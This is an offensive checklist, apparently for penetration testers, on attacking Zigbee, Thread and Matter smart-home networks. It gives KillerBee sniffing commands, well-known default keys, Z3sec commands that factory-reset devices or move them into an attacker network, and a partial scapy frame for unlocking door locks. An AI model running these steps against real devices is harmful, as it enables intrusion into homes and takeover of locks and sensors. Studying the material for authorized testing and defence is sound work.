offensive-zigbee-thread-matter

Zigbee / Thread / Matter Attacks

802.15.4-based mesh protocols underpin most "smart home" devices. Zigbee is widely deployed and has well-known crypto-key-reuse issues; Thread (modern, IPv6-based) ships with stronger defaults; Matter unifies their commissioning model with stronger crypto but still has implementation pitfalls.

Quick Workflow

1. Sniff target frequency (channels 11–26 in 2.4 GHz)
2. Identify network coordinator and joining devices
3. For Zigbee: try Touchlink commissioning with the well-known key
4. Capture join-key exchange when devices commission
5. Replay or inject ZCL/ZHA cluster commands

---

Hardware

Adapter	Use
TI CC2531 USB stick	Cheap, works with Zigbee2MQTT, KillerBee
TI CC2540 / CC2652	Zigbee + Thread + BLE
Sonoff Zigbee Dongle E (CC2652P)	Modern, well-supported
ApiMote (KillerBee dev)	Multi-channel, scapy-dot15d4
HackRF + appropriate firmware	Lower-level RF flexibility

Discovery + Sniffing

# KillerBee suite
zbstumbler -i 0                 # find Zigbee networks
zbid                            # ID coordinators
zbdump -c 11 -w zigbee.pcap     # dump channel 11 to pcap

# scapy-dot15d4 for crafted frames
python3
>>> from scapy.contrib.dot15d4 import *
>>> sniff(iface='/dev/ttyACM0', count=50)

In Wireshark with the dot15d4 + zbee_nwk dissectors, you'll see frame counters, network keys (if joined), and ZCL commands.

Touchlink Commissioning Abuse

Touchlink (used by Zigbee 3.0 commissioning, especially in lighting) uses a well-known transport key:

0x9F559A553B7A6B2C5C4FBB4E84956F3D

Many consumer Zigbee bulbs / strips accept Touchlink commissioning from any nearby radio with this key — joining them to your network or stealing them from theirs.

# z3sec — Zigbee 3 commissioning attack toolkit
git clone https://github.com/IoTsec/Z3sec
python z3sec_inter_pan.py --command "factory_reset_request" --device <addr>
python z3sec_inter_pan.py --command "join_network" --network <PANID>

Outcomes:

• Factory-reset victim devices remotely (DoS / mass disrupt)
• Steal lights / sensors into attacker network
• Read network keys after joining device-to-network

Network Key Capture During Joins

# Capture coordinator + joining device exchange
zbdump -c <ch> -w join.pcap

# Decrypt if you obtain the trust center link key
# Older Zigbee 1.x networks used a default trust center link key:
# ZigBeeAlliance09
# Modern networks use device-specific install codes

Once you have the network key, all traffic on that mesh is decrypted in Wireshark.

ZCL / ZHA Cluster Command Abuse

Zigbee Cluster Library defines on/off/level/lock clusters. With network key, you can issue commands as any device:

# scapy-dot15d4 frame to unlock a door lock
from scapy.contrib.dot15d4 import *
from scapy.contrib.zigbee import *

frame = Dot15d4FCS()/Dot15d4Data()/ZigbeeNWK(...)/ZigbeeAppDataPayload(...)/ZCLDoorLock(...)
sendp(frame, iface='/dev/ttyACM0')

The same primitive opens locks, toggles switches, dims lights, or floods the network with control traffic.

Thread Specifics

Thread (used by Apple HomePod, Nest, Eero) uses 802.15.4 with IPv6 (6LoWPAN) and stronger commissioning crypto.

• Network credential is a commissioner-distributed PSKc
• Devices join with the commissioner present
• Mesh commissioning protocol is over UDP/CoAP

Attack surface:

• PSKc theft from commissioner devices (mobile app companion, Apple Home, Nest app)
• Reusing a leaked credential to join target network
• 6LoWPAN routing attacks (rank manipulation, sinkhole)

Matter Commissioning

Matter unifies Zigbee/Thread/Wi-Fi device onboarding under one commissioning model:

• QR code or manual setup code grants commissioning permission
• Bluetooth LE used for initial commissioning
• Subsequent communication over Wi-Fi or Thread

Attack surface:

• Setup-code reuse / replay if commissioning window not closed
• BLE-MITM during initial commissioning (see offensive-bluetooth-ble)
• Fabric-attestation flaws in early implementations

Detection

• Coordinator may log unexpected device joins
• Hub apps surface "new device" notifications — commonly ignored by users
• Wireshark/Sonoff captures from defenders are rare — most environments don't monitor 802.15.4

Engagement Cheatsheet

# 1. Identify networks + channels
zbstumbler -i 0

# 2. Sniff target channel
zbdump -c <ch> -w cap.pcap
# Open in Wireshark with dot15d4/zigbee dissectors

# 3. Touchlink attack on consumer Zigbee 3.0 lighting
python z3sec_inter_pan.py --command "factory_reset_request" --target <addr>

# 4. Steal device into attacker network
python z3sec_inter_pan.py --command "join_network" --target <addr>

# 5. With network key, issue ZCL commands directly
# (custom scapy-dot15d4 + zbee_nwk frames)

# 6. For Thread: focus on commissioner / PSKc theft from companion apps

---

Key References

• KillerBee: github.com/riverloopsec/killerbee
• Z3sec: github.com/IoTsec/Z3sec
• "Zigbee Insecurity" research (CON Black Hat talks)
• Thread spec: threadgroup.org/support
• Matter / CSA spec: csa-iot.org/all-solutions/matter
• Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md